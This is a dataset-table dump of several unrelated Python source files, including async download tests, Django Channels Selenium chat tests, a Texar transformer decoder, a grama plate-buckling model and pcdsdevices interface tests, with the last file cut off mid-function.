ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py
|
1a5ed4d01d4dba59b0c69b838de1e2443fad8036
|
import hashlib
import aiofiles
import pytest
from aiofiles import os
from kanp.download import Downloader
from kanp.utils import get_real_download_url, get_video_info
@pytest.mark.asyncio
async def test_download():
url = "https://raw.githubusercontent.com/long2ice/kanp/dev/.dockerignore"
file = ".dockerignore.txt"
async with aiofiles.open(file, "ab+") as f:
async with Downloader(url,) as downloader:
async for block in downloader:
await f.write(block)
async with aiofiles.open(file, "rb") as f:
assert hashlib.md5(await f.read()).hexdigest() == "c59066fc1c16d900c6c9275c5f4a1757"
await os.remove(file)
@pytest.mark.asyncio
async def test_get_video_info():
url = "https://cn.pornhub.com/view_video.php?viewkey=ph5efb2f208eadc"
url = get_real_download_url(url)
content_length, content_type = await get_video_info(url)
assert (content_length, content_type) == (792786244, "video/mp4")
|
py
|
1a5ed55f1747f270f97cfa708bac8d10771698eb
|
KEEP_PROB = 0.5
LEARNING_RATE = 1e-5
BATCH_SIZE =50
PARAMETER_FILE = "checkpoint/variable.ckpt"
MAX_ITER = 50000
|
py
|
1a5ed61606e1679fe9bb90221c5c9d088912a081
|
# chat/tests.py
from channels.testing import ChannelsLiveServerTestCase
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.wait import WebDriverWait
class ChatTests(ChannelsLiveServerTestCase):
serve_static = True # emulate StaticLiveServerTestCase
@classmethod
def setUpClass(cls):
super().setUpClass()
try:
# NOTE: Requires "chromedriver" binary to be installed in $PATH
cls.driver = webdriver.Chrome()
except:
super().tearDownClass()
raise
@classmethod
def tearDownClass(cls):
cls.driver.quit()
super().tearDownClass()
def test_when_chat_message_posted_then_seen_by_everyone_in_same_room(self):
try:
self._enter_chat_room('room_1')
self._open_new_window()
self._enter_chat_room('room_1')
self._switch_to_window(0)
self._post_message('hello')
WebDriverWait(self.driver, 2).until(lambda _:
'hello' in self._chat_log_value,
'Message was not received by window 1 from window 1')
self._switch_to_window(1)
WebDriverWait(self.driver, 2).until(lambda _:
'hello' in self._chat_log_value,
'Message was not received by window 2 from window 1')
finally:
self._close_all_new_windows()
def test_when_chat_message_posted_then_not_seen_by_anyone_in_different_room(self):
try:
self._enter_chat_room('room_1')
self._open_new_window()
self._enter_chat_room('room_2')
self._switch_to_window(0)
self._post_message('hello')
WebDriverWait(self.driver, 2).until(lambda _:
'hello' in self._chat_log_value,
'Message was not received by window 1 from window 1')
self._switch_to_window(1)
self._post_message('world')
WebDriverWait(self.driver, 2).until(lambda _:
'world' in self._chat_log_value,
'Message was not received by window 2 from window 2')
self.assertTrue('hello' not in self._chat_log_value,
'Message was improperly received by window 2 from window 1')
finally:
self._close_all_new_windows()
# === Utility ===
def _enter_chat_room(self, room_name):
self.driver.get(self.live_server_url + '/chat/')
ActionChains(self.driver).send_keys(room_name + '\n').perform()
WebDriverWait(self.driver, 2).until(lambda _:
room_name in self.driver.current_url)
def _open_new_window(self):
self.driver.execute_script('window.open("about:blank", "_blank");')
self.driver.switch_to_window(self.driver.window_handles[-1])
def _close_all_new_windows(self):
while len(self.driver.window_handles) > 1:
self.driver.switch_to_window(self.driver.window_handles[-1])
self.driver.execute_script('window.close();')
if len(self.driver.window_handles) == 1:
self.driver.switch_to_window(self.driver.window_handles[0])
def _switch_to_window(self, window_index):
self.driver.switch_to_window(self.driver.window_handles[window_index])
def _post_message(self, message):
ActionChains(self.driver).send_keys(message + '\n').perform()
@property
def _chat_log_value(self):
return self.driver.find_element_by_css_selector('#chat-log').get_property('value')
|
py
|
1a5ed6d5991caed951ca44281eb081c307c1db7b
|
# Copyright 2019 The Texar Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Transformer decoder.
"""
import warnings
from typing import Callable, Dict, NamedTuple, Optional, Tuple, Union
import torch
from torch import nn
from texar.torch.core import layers
from texar.torch.modules.decoders.decoder_base import (
DecoderBase, TokenEmbedder, TokenPosEmbedder, _make_output_layer)
from texar.torch.modules.decoders.decoder_helpers import (
EmbeddingHelper, Helper)
from texar.torch.modules.encoders.multihead_attention import (
Cache, MultiheadAttentionEncoder)
from texar.torch.modules.encoders.transformer_encoder import (
default_transformer_poswise_net_hparams)
from texar.torch.modules.networks.networks import FeedForwardNetwork
from texar.torch.utils import transformer_attentions as attn
from texar.torch.utils.beam_search import beam_search
from texar.torch.utils.shapes import mask_sequences
from texar.torch.utils.utils import sequence_mask
__all__ = [
'TransformerDecoderOutput',
'TransformerDecoder',
]
EmbeddingFn = Callable[[torch.LongTensor, torch.LongTensor], torch.Tensor]
class TransformerDecoderOutput(NamedTuple):
r"""The output of :class:`TransformerDecoder`.
"""
logits: torch.Tensor
r"""A :tensor:`Tensor` of shape ``[batch_size, max_time, vocab_size]``
containing the logits."""
sample_id: torch.LongTensor
r"""A :tensor:`LongTensor` of shape ``[batch_size, max_time]`` containing
the sampled token indices."""
class TransformerDecoder(DecoderBase[Cache, TransformerDecoderOutput]):
r"""Transformer decoder that applies multi-head self-attention for
sequence decoding.
It is a stack of
:class:`~texar.torch.modules.encoders.MultiheadAttentionEncoder`,
:class:`~texar.torch.modules.FeedForwardNetwork`, and residual connections.
Args:
token_embedder: An instance of :torch_nn:`Module`, or a function taking
a :tensor:`LongTensor` ``tokens`` as argument. This is the embedder
called in :meth:`embed_tokens` to convert input tokens to
embeddings.
token_pos_embedder: An instance of :torch_nn:`Module`, or a function
taking two :tensor:`LongTensor`\ s ``tokens`` and ``positions`` as
argument. This is the embedder called in :meth:`embed_tokens` to
convert input tokens with positions to embeddings.
.. note::
Only one among :attr:`token_embedder` and
:attr:`token_pos_embedder` should be specified. If neither is
specified, you must subclass :class:`TransformerDecoder` and
override :meth:`embed_tokens`.
vocab_size (int, optional): Vocabulary size. Required if
:attr:`output_layer` is `None`.
output_layer (optional): An output layer that transforms cell output
to logits. This can be:
- A callable layer, e.g., an instance of :torch_nn:`Module`.
- A tensor. A :torch_nn:`Linear` layer will be created using the
tensor as weights. The bias of the dense layer is determined
by ``hparams.output_layer_bias``. This can be used to tie the
output layer with the input embedding matrix, as proposed in
https://arxiv.org/pdf/1608.05859.pdf.
- `None`. A :torch_nn:`Linear` layer will be created based on
:attr:`vocab_size` and ``hparams.output_layer_bias``.
- If no output layer is needed at the end, set
:attr:`vocab_size` to `None` and ``output_layer`` to
:func:`~texar.torch.core.identity`.
hparams (dict or HParams, optional): Hyperparameters. Missing
hyperparameters will be set to default values. See
:meth:`default_hparams` for the hyperparameter structure and
default values.
.. document private functions
"""
# State variables used during `dynamic_decode`. Assigned in `forward`.
_state_max_decoding_length: int
_state_context: Optional[torch.LongTensor]
_state_context_sequence_length: Optional[torch.LongTensor]
_state_cache: Cache
def __init__(self,
token_embedder: Optional[TokenEmbedder] = None,
token_pos_embedder: Optional[TokenPosEmbedder] = None,
vocab_size: Optional[int] = None,
output_layer: Optional[Union[nn.Module, torch.Tensor]] = None,
hparams=None):
super().__init__(
token_embedder, token_pos_embedder,
input_time_major=False, output_time_major=False, hparams=hparams)
if token_pos_embedder is None and token_embedder is not None:
warnings.warn(
"Transformer models cannot capture positional information if "
"no positional embedding is provided.")
self._input_size = self._hparams.dim
self._output_layer, self._vocab_size = _make_output_layer(
output_layer, vocab_size, self._input_size,
self._hparams.output_layer_bias)
self.self_attns = nn.ModuleList()
self.self_attn_layer_norm = nn.ModuleList()
self.enc_dec_attns = nn.ModuleList()
self.end_dec_attn_layer_norm = nn.ModuleList()
self.poswise_networks = nn.ModuleList()
self.poswise_layer_norm = nn.ModuleList()
if self._hparams.use_gpt_config:
eps = 1e-5
else:
eps = 1e-12
for _ in range(self._hparams.num_blocks):
attn_module = MultiheadAttentionEncoder(
self._input_size, self._hparams.multihead_attention)
if self._hparams.dim != attn_module.output_size:
raise ValueError("The output dimension of "
"MultiheadEncoder should be equal "
"to the dim of TransformerDecoder")
self.self_attns.append(attn_module)
self.self_attn_layer_norm.append(
nn.LayerNorm(self._input_size, eps=eps))
attn_module = MultiheadAttentionEncoder(
self._input_size, self._hparams.multihead_attention)
if self._hparams.dim != attn_module.output_size:
raise ValueError("The output dimension of "
"MultiheadEncoder should be equal "
"to the dim of TransformerDecoder")
self.enc_dec_attns.append(attn_module)
self.end_dec_attn_layer_norm.append(
nn.LayerNorm(self._input_size, eps=eps))
poswise_network = FeedForwardNetwork(
hparams=self._hparams.poswise_feedforward)
if (poswise_network.hparams.layers[-1]['kwargs']['out_features']
!= self._hparams.dim):
raise ValueError("The output dimension of "
"FeedForwardNetwork should be equal "
"to the dim of TransformerDecoder")
self.poswise_networks.append(poswise_network)
self.poswise_layer_norm.append(
nn.LayerNorm(self._input_size, eps=eps))
self.final_layer_norm = nn.LayerNorm(self._input_size, eps=eps)
self.embed_dropout = nn.Dropout(self._hparams.embedding_dropout)
self.residual_dropout = nn.Dropout(self._hparams.residual_dropout)
if self._hparams.initializer:
# TODO: This might be different to what TensorFlow does
initialize = layers.get_initializer(self._hparams.initializer)
assert initialize is not None
# Do not re-initialize LayerNorm modules.
for name, param in self.named_parameters():
if name.split(".")[-1] == "weight" and "layer_norm" not in name:
initialize(param)
@staticmethod
def default_hparams():
r"""Returns a dictionary of hyperparameters with default values.
.. code-block:: python
{
# Same as in TransformerEncoder
"num_blocks": 6,
"dim": 512,
"use_gpt_config": False,
"embedding_dropout": 0.1,
"residual_dropout": 0.1,
"poswise_feedforward": default_transformer_poswise_net_hparams,
"multihead_attention": {
'name': 'multihead_attention',
'num_units': 512,
'output_dim': 512,
'num_heads': 8,
'dropout_rate': 0.1,
'use_bias': False,
},
"initializer": None,
"name": "transformer_decoder"
# Additional for TransformerDecoder
"embedding_tie": True,
"output_layer_bias": False,
"max_decoding_length": int(1e10),
}
Here:
`"num_blocks"`: int
Number of stacked blocks.
`"dim"`: int
Hidden dimension of the encoder.
`"use_gpt_config"`: bool
Whether to follow the `eps` setting of OpenAI GPT.
`"embedding_dropout"`: float
Dropout rate of the input word and position embeddings.
`"residual_dropout"`: float
Dropout rate of the residual connections.
`"poswise_feedforward"`: dict
Hyperparameters for a feed-forward network used in residual
connections.
Make sure the dimension of the output tensor is equal to ``dim``.
See
:func:`~texar.torch.modules.default_transformer_poswise_net_hparams`
for details.
`"multihead_attention"`: dict
Hyperparameters for the multi-head attention strategy.
Make sure the ``output_dim`` in this module is equal to ``dim``.
See :class:`~texar.torch.modules.MultiheadAttentionEncoder`
for details.
`"initializer"`: dict, optional
Hyperparameters of the default initializer that initializes
variables created in this module.
See :func:`~texar.torch.core.get_initializer` for details.
`"embedding_tie"`: bool
Whether to use the word embedding matrix as the output layer
that computes logits. If `False`, a new dense layer is created.
`"output_layer_bias"`: bool
Whether to use bias to the output layer.
`"max_decoding_length"`: int
The maximum allowed number of decoding steps.
Set to a very large number of avoid the length constraint.
Ignored if provided in :meth:`forward` or ``"train_greedy"``
decoding is used.
`"name"`: str
Name of the module.
"""
dim = 512
return {
'num_blocks': 6,
'dim': dim,
'use_gpt_config': False,
'embedding_tie': True,
'output_layer_bias': False,
'max_decoding_length': int(1e10),
'embedding_dropout': 0.1,
'residual_dropout': 0.1,
'poswise_feedforward': default_transformer_poswise_net_hparams(dim),
'multihead_attention': {
'name': 'multihead_attention',
'num_units': 512,
'num_heads': 8,
'dropout_rate': 0.1,
'output_dim': 512,
'use_bias': False,
},
'initializer': None,
'name': "transformer_decoder",
}
def _inputs_to_outputs(self, inputs: torch.Tensor,
cache: Cache) -> Tuple[torch.Tensor, Cache]:
r"""Returns the outputs of one decoding step (for example,
the predicted logits of the next token).
:attr:`inputs` should be of shape ``[batch_size, dim]``.
Returns:
A tuple of logits and updated cache. Logits are of shape
``[batch_size, vocab_size]``.
"""
outputs = self._self_attention_stack(
inputs.unsqueeze(1), memory=cache['memory'], cache=cache)
outputs = self._output_layer(outputs)
outputs = outputs.squeeze(1)
return outputs, cache
def forward(self, # type: ignore
inputs: Optional[torch.Tensor] = None,
sequence_length: Optional[torch.LongTensor] = None,
memory: Optional[torch.Tensor] = None,
memory_sequence_length: Optional[torch.LongTensor] = None,
memory_attention_bias: Optional[torch.Tensor] = None,
context: Optional[torch.Tensor] = None,
context_sequence_length: Optional[torch.LongTensor] = None,
helper: Optional[Helper] = None,
decoding_strategy: str = 'train_greedy',
max_decoding_length: Optional[int] = None,
impute_finished: bool = False,
infer_mode: Optional[bool] = None,
beam_width: Optional[int] = None,
length_penalty: float = 0.,
**kwargs) \
-> Union[
TransformerDecoderOutput,
Tuple[TransformerDecoderOutput, torch.LongTensor],
Dict[str, torch.Tensor]]:
r"""Performs decoding.
The interface is very similar to that of RNN decoders
(:class:`texar.torch.modules.RNNDecoderBase`). In particular,
the function provides **3 ways** to specify the decoding method, with
varying flexibility:
1. The :attr:`decoding_strategy` argument.
- **"train_greedy"**: decoding in teacher-forcing fashion (i.e.,
feeding ground truth to decode the next step), and for each step
sample is obtained by taking the `argmax` of logits.
Argument :attr:`inputs` is required for this strategy.
:attr:`sequence_length` is optional.
- **"infer_greedy"**: decoding in inference fashion (i.e., feeding
`generated` sample to decode the next step), and for each step
sample is obtained by taking the `argmax` of logits.
Arguments :attr:`(start_tokens, end_token)` are
required for this strategy, and argument
:attr:`max_decoding_length` is optional.
- **"infer_sample"**: decoding in inference fashion, and for each
step sample is obtained by `random sampling` from the logits.
Arguments :attr:`(start_tokens, end_token)` are required for this
strategy, and argument :attr:`max_decoding_length` is optional.
This argument is used only when arguments :attr:`helper` and
:attr:`beam_width` are both `None`.
2. The :attr:`helper` argument: An instance of subclass of
:class:`texar.torch.modules.decoders.Helper`.
This provides a superset of decoding strategies than above.
The interface is the same as in RNN decoders.
Please refer to :meth:`texar.torch.modules.RNNDecoderBase.forward`
for detailed usage and examples.
Note that, here, though using a
:class:`~texar.torch.decoder.TrainingHelper` corresponding to the
``"train_greedy"`` strategy above, the implementation is *slower*
than directly setting ``decoding_strategy="train_greedy"`` (though
output results are the same).
Argument :attr:`max_decoding_length` is optional.
3. **Beam search**: set :attr:`beam_width` to use beam search decoding.
Arguments :attr:`(start_tokens, end_token)` are required,
and argument :attr:`max_decoding_length` is optional.
Args:
memory (optional): The memory to attend, e.g., the output of an RNN
encoder. A :tensor:`Tensor` of shape
``[batch_size, memory_max_time, dim]``.
memory_sequence_length (optional): A :tensor:`Tensor` of shape
``[batch_size]`` containing the sequence lengths for the batch
entries in memory. Used to create attention bias of
:attr:`memory_attention_bias` is not given. Ignored if
:attr:`memory_attention_bias` is provided.
memory_attention_bias (optional): A :tensor:`Tensor` of shape
``[batch_size, num_heads, memory_max_time, dim]``.
An attention bias typically sets the value of a padding
position to a large negative value for masking. If not given,
:attr:`memory_sequence_length` is used to automatically
create an attention bias.
inputs (optional): Input tensors for teacher forcing decoding.
Used when :attr:`decoding_strategy` is set to
``"train_greedy"``, or when `hparams`-configured helper is used.
The attr:`inputs` is a :tensor:`LongTensor` used as index to
look up embeddings and feed in the decoder. For example, if
:attr:`embedder` is an instance of
:class:`~texar.torch.modules.WordEmbedder`, then :attr:`inputs`
is usually a 2D int Tensor `[batch_size, max_time]` (or
`[max_time, batch_size]` if `input_time_major` == `True`)
containing the token indexes.
sequence_length (optional): A :tensor:`LongTensor` of shape
``[batch_size]``, containing the sequence length of
:attr:`inputs`. Tokens beyond the respective sequence length are
masked out.
Used when :attr:`decoding_strategy` is set to
``"train_greedy"``.
decoding_strategy (str): A string specifying the decoding
strategy, including ``"train_greedy"``, ``"infer_greedy"``,
``"infer_sample"``.
Different arguments are required based on the
strategy. See above for details. Ignored if
:attr:`beam_width` or :attr:`helper` is set.
beam_width (int): Set to use beam search. If given,
:attr:`decoding_strategy` is ignored.
length_penalty (float): Length penalty coefficient used in beam
search decoding. Refer to https://arxiv.org/abs/1609.08144
for more details.
It should be larger if longer sentences are desired.
context (optional): An :tensor:`LongTensor` of shape
``[batch_size, length]``, containing the starting tokens for
decoding. If context is set, ``start_tokens`` of the
:class:`~texar.torch.modules.Helper` will be ignored.
context_sequence_length (optional): Specify the length of context.
max_decoding_length (int, optional): The maximum allowed number of
decoding steps.
If `None` (default), use ``"max_decoding_length"`` defined in
:attr:`hparams`. Ignored in ``"train_greedy"`` decoding.
impute_finished (bool): If `True`, then states for batch
entries which are marked as finished get copied through and
the corresponding outputs get zeroed out. This causes some
slowdown at each time step, but ensures that the final state
and outputs have the correct values and that backprop ignores
time steps that were marked as finished. Ignored in
``"train_greedy"`` decoding.
helper (optional): An instance of
:class:`texar.torch.modules.decoders.Helper`
that defines the decoding strategy. If given,
``decoding_strategy`` and helper configurations in
:attr:`hparams` are ignored.
infer_mode (optional): If not `None`, overrides mode given by
:attr:`self.training`.
Returns:
- For **"train_greedy"** decoding, returns an instance of
:class:`~texar.torch.modules.TransformerDecoderOutput` which
contains `sample_id` and `logits`.
- For **"infer_greedy"** and **"infer_sample"** decoding or
decoding with :attr:`helper`, returns
a tuple ``(outputs, sequence_lengths)``, where ``outputs`` is an
instance of :class:`~texar.torch.modules.TransformerDecoderOutput`
as in `"train_greedy"`, and ``sequence_lengths`` is a
:tensor:`LongTensor` of shape ``[batch_size]`` containing the
length of each sample.
- For **beam search** decoding, returns a ``dict`` containing keys
``"sample_id"`` and ``"log_prob"``.
- ``"sample_id"`` is a :tensor:`LongTensor` of shape
``[batch_size, max_time, beam_width]`` containing generated
token indexes. ``sample_id[:,:,0]`` is the highest-probable
sample.
- ``"log_prob"`` is a :tensor:`Tensor` of shape
``[batch_size, beam_width]`` containing the log probability
of each sequence sample.
"""
if memory is not None:
if memory_attention_bias is None:
if memory_sequence_length is None:
raise ValueError(
"`memory_sequence_length` is required if "
"`memory_attention_bias` is not given.")
enc_padding = 1 - sequence_mask(
memory_sequence_length, memory.size(1),
dtype=torch.float32)
memory_attention_bias = attn.attention_bias_ignore_padding(
enc_padding)
# record the context, which will be used in step function
# for dynamic_decode
if context is not None:
if context_sequence_length is None:
raise ValueError("'context_sequence_length' must not be None"
"when 'context' is specified.")
self._state_context = context[:, 1:]
self._state_context_sequence_length = context_sequence_length - 1
else:
self._state_context = None
self._state_context_sequence_length = None
# Faster code path for teacher-forcing training
if (helper is None and beam_width is None and
decoding_strategy == 'train_greedy'):
if inputs is None:
raise ValueError("'input' must not be none "
"when using 'train_greedy' decoding strategy.")
times = torch.arange(
inputs.size(1), dtype=torch.long, device=inputs.device)
times = times.unsqueeze(0).expand(inputs.size(0), -1)
inputs = self.embed_tokens(inputs, times)
if sequence_length is not None:
inputs = mask_sequences(inputs, sequence_length)
decoder_self_attention_bias = (
attn.attention_bias_lower_triangle(inputs.size(1)))
decoder_output = self._self_attention_stack(
inputs, memory, decoder_self_attention_bias,
memory_attention_bias, cache=None)
logits = self._output_layer(decoder_output)
sample_id = torch.argmax(logits, dim=-1)
return TransformerDecoderOutput(logits, sample_id)
# Inference code path.
if max_decoding_length is None:
max_decoding_length = self._hparams.max_decoding_length
self._state_max_decoding_length = max_decoding_length
if beam_width is None or beam_width == 1: # Inference-like decoding
# Prepare helper
if helper is None:
kwargs.update(decoding_strategy=decoding_strategy)
if context is not None:
kwargs.update(start_tokens=context[:, 0])
helper = self._create_or_get_helper(infer_mode, **kwargs)
assert isinstance(helper, EmbeddingHelper)
self._state_cache = self._init_cache(
memory, memory_attention_bias,
beam_search_decoding=False, batch_size=helper.batch_size)
if context is not None:
assert self._state_context is not None
pad_length = max_decoding_length - self._state_context.size(1)
if pad_length > 0:
self._state_context = torch.cat((
self._state_context,
self._state_context.new_zeros(
self._state_context.size(0), pad_length)
), dim=1)
outputs, cache, sequence_lengths = self.dynamic_decode(
helper, inputs=None, sequence_length=None,
initial_state=None, max_decoding_length=max_decoding_length,
impute_finished=impute_finished)
del cache # not used
if context is not None:
# Here the length of sample_id will be larger than that
# of logit by 1, because there will be a additional
# start_token in the returned sample_id.
# the start_id should be the first token of the
# given context
start_tokens = context[:, 0]
outputs = TransformerDecoderOutput(
logits=outputs.logits,
sample_id=torch.cat([
start_tokens.unsqueeze(1),
outputs.sample_id
], dim=1))
sequence_lengths = sequence_lengths + 1
return outputs, sequence_lengths
else: # Beam-search decoding
# Ignore `decoding_strategy` and # assume `helper` is not set.
if helper is not None:
raise ValueError("Must not set 'beam_width' and 'helper' "
"simultaneously.")
if context is not None:
start_tokens = context[:, 0]
else:
if 'start_tokens' not in kwargs:
raise ValueError(
"'start_tokens' must be specified when using"
"beam search decoding.")
start_tokens = kwargs['start_tokens']
_batch_size = start_tokens.size(0)
self._state_cache = self._init_cache(
memory, memory_attention_bias,
beam_search_decoding=True,
batch_size=_batch_size)
end_token: int = kwargs.get('end_token') # type: ignore
# The output format is different when running beam search.
sample_id, log_prob = self.beam_decode(
start_tokens,
end_token,
embedding_fn=self.embed_tokens,
beam_width=beam_width,
length_penalty=length_penalty,
decode_length=max_decoding_length)
return {
'sample_id': sample_id,
'log_prob': log_prob
}
def _self_attention_stack(
self, inputs: torch.Tensor,
memory: Optional[torch.Tensor],
decoder_self_attention_bias: Optional[torch.Tensor] = None,
memory_attention_bias: Optional[torch.Tensor] = None,
cache: Optional[Cache] = None) -> torch.Tensor:
r"""Forward through the stacked multi-head attentions.
"""
inputs = self.embed_dropout(inputs)
if cache is not None:
if memory is not None:
memory_attention_bias = cache['memory_attention_bias']
else:
assert decoder_self_attention_bias is not None
x = inputs
for i in range(self._hparams.num_blocks):
layer_cache = cache['layers'][i] if cache is not None else None
selfatt_output = self.self_attns[i](
queries=self.self_attn_layer_norm[i](x),
memory=None,
memory_attention_bias=decoder_self_attention_bias,
cache=layer_cache)
x = x + self.residual_dropout(selfatt_output)
if memory is not None:
encdec_output = self.enc_dec_attns[i](
queries=self.end_dec_attn_layer_norm[i](x),
memory=memory,
memory_attention_bias=memory_attention_bias)
x = x + self.residual_dropout(encdec_output)
sub_output = self.poswise_networks[i](self.poswise_layer_norm[i](x))
x = x + self.residual_dropout(sub_output)
return self.final_layer_norm(x)
def _init_cache(self, memory: Optional[torch.Tensor],
memory_attention_bias: Optional[torch.Tensor],
beam_search_decoding: bool,
batch_size: int) -> Cache:
r"""Returns an initialized cache.
In order to support both inference-like decoding and beam-search
decoding, the elements of each layer must be initialized and extended
as different structure respectively. Specifically, for inference-like
decoding, a simple list is used; for beam-search decoding, a
:tensor:`Tensor` of shape ``[batch_size, current_steps, num_units]``
is maintained, where ``current_steps`` is the number of steps currently
decoded.
"""
device = next(self.parameters()).device
def _create_ta():
return []
def _create_empty_tensor():
ret = torch.zeros(
batch_size, 0, self._hparams.multihead_attention.num_units,
dtype=torch.float, device=device)
return ret
_create_fn = (_create_empty_tensor if beam_search_decoding
else _create_ta)
cache: Cache = {
'memory': memory,
'memory_attention_bias': memory_attention_bias,
'layers': [{
'keys': _create_fn(),
'values': _create_fn(),
} for _ in range(self._hparams.num_blocks)],
}
return cache
def beam_decode(self, start_tokens: torch.LongTensor, end_token: int,
embedding_fn: Callable[
[torch.LongTensor, torch.LongTensor], torch.Tensor],
decode_length: int = 256, beam_width: int = 5,
length_penalty: float = 0.6) \
-> Tuple[torch.Tensor, torch.Tensor]:
def _symbols_to_logits_fn(ids, cache):
batch_size = ids.size(0)
step = ids.size(-1) - 1
times = ids.new_full((batch_size,), step)
inputs = embedding_fn(ids[:, -1], times)
return self._inputs_to_outputs(inputs, cache)
assert self._vocab_size is not None
outputs, log_prob = beam_search(
_symbols_to_logits_fn,
start_tokens,
beam_width,
decode_length,
self._vocab_size,
length_penalty,
states=self._state_cache,
eos_id=end_token)
# Ignores <BOS>
outputs = outputs[:, :, 1:]
# shape = [batch_size, seq_length, beam_width]
outputs = outputs.permute(0, 2, 1)
return outputs, log_prob
@property
def output_size(self) -> int:
r"""Output size of one step.
"""
return self._input_size
def initialize(self, helper: Helper, inputs: Optional[torch.Tensor],
sequence_length: Optional[torch.LongTensor],
initial_state: Optional[Cache]) \
-> Tuple[torch.ByteTensor, torch.Tensor, Cache]:
initial_finished, initial_inputs = helper.initialize(
self.embed_tokens, inputs, sequence_length)
state = initial_state or self._state_cache
return initial_finished, initial_inputs, state
def step(self, helper: Helper, time: int,
inputs: torch.Tensor, state: Optional[Cache]) \
-> Tuple[TransformerDecoderOutput, Cache,
torch.Tensor, torch.ByteTensor]:
assert state is not None
outputs, state = self._inputs_to_outputs(inputs, state)
sample_ids = helper.sample(time=time, outputs=outputs)
if self._state_context is not None:
assert self._state_context_sequence_length is not None
sample_ids = torch.where(
self._state_context_sequence_length > time,
self._state_context[:, time],
sample_ids)
if time + 1 == self._state_max_decoding_length:
# Maximum decoding length reached, mark all batches as finished.
# This requires special handling because performing lookup on
# position embeddings with `time + 1` may result in IndexError.
finished = torch.ones_like(sample_ids, dtype=torch.uint8)
# Since `next_inputs` will not be used, simply create a null tensor.
next_inputs = torch.empty(0)
else:
finished, next_inputs = helper.next_inputs(
self.embed_tokens, time, outputs, sample_ids)
next_state = state
outputs = TransformerDecoderOutput(
logits=outputs,
sample_id=sample_ids)
return outputs, next_state, next_inputs, finished
def finalize(self, # type: ignore
outputs: TransformerDecoderOutput,
final_state: Optional[Cache],
sequence_lengths: torch.LongTensor) \
-> Tuple[TransformerDecoderOutput, Optional[Cache]]:
# Clear state variables at end of decoding.
del self._state_max_decoding_length
del self._state_context
del self._state_context_sequence_length
del self._state_cache
return super().finalize(outputs, final_state, sequence_lengths)
|
py
|
1a5ed85aeadbcd107aa234f83013db65b301facd
|
import grama as gr
import numpy as np
## Load data for RV model
from grama.data import df_stang
## Functions
def fun_critical(x):
E, mu, t, h = x
return np.pi ** 2 * E / 12 / (1 - mu ** 2) * (t / h) ** 2
var_critical = ["E", "mu", "t", "h"]
out_critical = ["sig_cr"]
def fun_applied(x):
L, w, t = x
return L / w / t
var_applied = ["L", "w", "t"]
out_applied = ["sig_app"]
def fun_limit(x):
sig_cr, sig_app = x
return sig_cr - sig_app
var_limit = ["sig_cr", "sig_app"]
out_limit = ["safety"]
## Build model
md_plate = (
gr.Model("Plate under buckling load")
>> gr.cp_function(
fun=fun_critical, var=var_critical, out=out_critical, name="Critical"
)
>> gr.cp_function(fun=fun_applied, var=var_applied, out=out_applied, name="Applied")
>> gr.cp_function(fun=fun_limit, var=var_limit, out=out_limit, name="Safety")
>> gr.cp_bounds( # Deterministic variables
t=(0.03, 0.12), # Thickness
w=(6, 18), # Width
h=(6, 18), # Height
L=(2.5e-1, 4.0e-1), # Load
)
>> gr.cp_marginals( # Random variables
E=gr.marg_gkde(df_stang.E), mu=gr.marg_gkde(df_stang.mu)
)
>> gr.cp_copula_gaussian(df_data=df_stang)
) # Dependence
|
py
|
1a5ed8ac75f53f29554dbe8c2d046c9149f540c6
|
from Xdmf import *
if __name__ == "__main__":
primaryDomain = XdmfDomain.New()
testGrid = XdmfUnstructuredGrid.New()
primaryDomain.insert(testGrid)
testGeometry = XdmfGeometry.New()
for i in range (0, 11):
testGeometry.pushBackAsInt32(i);
testGrid.setGeometry(testGeometry)
testTopology = XdmfTopology.New()
testGrid.setTopology(testTopology)
arrayWriter = XdmfWriter.New("array.xmf")
primaryDomain.accept(arrayWriter)
|
py
|
1a5ed951d0e9645466af2b855c75ce01d1d4ba8e
|
import matplotlib.pyplot as plt
import numpy as np
from plotData import *
from mapFeature import *
def plot_decision_boundary(theta, X, y):
plot_data(X[:, 1:3], y)
if X.shape[1] <= 3:
# Only need two points to define a line, so choose two endpoints
plot_x = np.array([np.min(X[:, 1]) - 2, np.max(X[:, 1]) + 2])
# Calculate the decision boundary line
plot_y = (-1/theta[2]) * (theta[1]*plot_x + theta[0])
plt.plot(plot_x, plot_y)
plt.legend(['Decision Boundary', 'Admitted', 'Not admitted'], loc=1)
plt.axis([30, 100, 30, 100])
else:
# Here is the grid range
u = np.linspace(-1, 1.5, 50)
v = np.linspace(-1, 1.5, 50)
z = np.zeros((u.size, v.size))
# Evaluate z = theta*x over the grid
for i in range(0, u.size):
for j in range(0, v.size):
z[i, j] = np.dot(map_feature(u[i], v[j]), theta)
z = z.T
# Plot z = 0
# Notice you need to specify the range [0, 0]
cs = plt.contour(u, v, z, levels=[0], colors='r')
plt.legend([cs.collections[0]], ['Decision Boundary'])
plt.show()
|
py
|
1a5edaab6e5c35d0931a7dfba5ebaaf6cb398f58
|
import fcntl
import logging
import multiprocessing as mp
import os
import signal
import threading
import time
import conftest
import ophyd
import pytest
from pcdsdevices.interface import (BaseInterface, TabCompletionHelperClass,
get_engineering_mode, set_engineering_mode,
setup_preset_paths)
from pcdsdevices.sim import FastMotor, SlowMotor
logger = logging.getLogger(__name__)
@pytest.fixture(scope='function')
def slow_motor():
return SlowMotor(name='sim_slow')
@pytest.fixture(scope='function')
def fast_motor():
return FastMotor(name='sim_fast')
@pytest.mark.timeout(5)
def test_mv(fast_motor):
logger.debug('test_mv')
fast_motor(3, wait=True)
assert fast_motor.wm() == 3
fast_motor.mvr(1, wait=True)
assert fast_motor() == 4
@pytest.mark.timeout(5)
def test_umv(slow_motor):
logger.debug('test_umv')
start_position = slow_motor.position
delta = 2
slow_motor.umvr(delta)
assert slow_motor.position == start_position + delta
def test_camonitor(fast_motor):
logger.debug('test_camonitor')
pid = os.getpid()
def interrupt():
time.sleep(0.1)
os.kill(pid, signal.SIGINT)
threading.Thread(target=interrupt, args=()).start()
fast_motor.camonitor()
def test_mv_ginput(monkeypatch, fast_motor):
